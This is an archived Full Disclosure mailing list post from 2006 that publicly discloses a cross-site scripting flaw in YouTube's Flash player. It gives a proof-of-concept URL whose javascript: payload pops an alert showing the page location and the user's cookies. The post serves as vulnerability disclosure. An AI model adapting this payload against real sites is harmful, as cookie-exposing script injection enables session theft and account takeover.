Full Disclosure mailing list archives
Merry Christmas Youtube! (XSS vuln)
From: Paul <pvnick () gmail com>
Date: Sun, 24 Dec 2006 14:00:18 -0500
The following URL will cause javascript to execute in the context of youtube http://www.youtube.com/p.swf?video_id=eVFF98kNg8Q&eurl=&t=&iurl=javascript:alert('Javascript%20executed!\r\n\r\nLocation: '%2bwindow.location%2b'\r\n\r\nCookie: '%2bdocument.cookie) Cheers _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Merry Christmas Youtube! (XSS vuln) Paul (Dec 24)